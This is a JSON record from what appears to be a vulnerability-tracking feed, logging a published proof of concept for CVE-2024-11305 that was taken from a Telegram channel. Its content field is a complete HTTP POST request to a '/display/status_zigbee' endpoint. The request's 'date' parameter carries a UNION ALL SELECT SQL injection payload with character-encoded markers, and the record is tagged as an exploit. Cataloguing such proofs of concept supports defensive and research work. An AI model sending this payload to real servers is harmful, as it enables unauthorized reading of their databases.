{"uuid": "0d758f7c-9309-4390-9e03-93a1ff263538", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-11305", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3468", "content": "CVE-2024-11305\n\nPOST /index.php/display/status_zigbee HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\ndate=2024-11-06%' UNION ALL SELECT 11,CHAR(113)CHAR(75,101,86,69,115,83,113,89,100,122,121,102,83,83,113,86,84,112,100,103,69,75,80,117,88,109,83,105,89,116,110,120,76,84,73,109,115,100,83,107)CHAR(113,118,98,98,113),11-- wPIB\n\n#exploit #poc #SQL", "creation_timestamp": "2024-11-19T09:51:16.000000Z"}